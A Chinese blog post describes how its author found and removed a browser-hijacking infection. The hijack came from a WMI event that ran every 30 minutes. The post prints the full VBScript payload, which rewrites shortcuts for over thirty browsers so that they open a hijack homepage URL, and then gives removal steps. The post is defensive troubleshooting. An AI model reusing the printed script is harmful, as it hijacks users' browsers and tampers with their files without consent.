利用WMITool解决浏览器快捷方式启动参数被篡改以及浏览器主页被劫持的问题

先说说症状

症状①:通过快捷方式启动浏览器,首页跳转到2345以及hao123网址导航页,切系统内安装的多款浏览器(IE、Chrome、Firefox、Opera、Safari、Maxthon)症状相同

症状②:金山毒霸会提示浏览器快捷方式异常,并删除该快捷方式

 

分析问题

从毒霸删除的文件中恢复快捷方式,查看快捷方式属性,如下图,可以看出,快捷方式的目标被添加了启动参数

考虑到可能因为启动项、服务、注册表、事件和任务计划造成,但这些地方均未查出任何信息。

后来通过金山毒霸、NOD32等杀毒软件扫描全盘,也未查出任何问题。

再后来想到了使用ProcessMonitor进行监视,发现每隔一段时间(我这里大概是半个小时的样子)出现一个scrcons.exe进程自动启动并修改快捷方式的命令,然后自动关闭(幸好是半个小时一次,要是3、5小时一次,那我估计得疯了吧…)

查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。
要查看WMI事件,下载WMITool并安装,

安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“root\CIMV2”,确定,出现下图:

 

在右侧选中后右击 -> 选择view instant properties

 

On Error Resume Next:Const link = "http://hao.ttmmt.com/?v=1030":Const link360 = "http://hao.ttmmt.com/?v=1030&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

 查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上"http://hao.ttmmt.com/?v=1030"(总算把你揪出来了,藏得够深的)

受到影响的浏览器基本涵盖了市面上现有的所有浏览器(30余款),如下:

"114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

 

解决办法:

选中左侧选项,右键 -> 删除!

删不掉? 到WMITool安装路径(例如:D:\Program Files (x86)\WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!再行删之!

还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的"http://hao.ttmmt.com/?v=1030"去掉!

希望大家能够把这解决方法普及开来...

posted @ 2018-07-10 17:06  Yiven  阅读(...)  评论(...编辑  收藏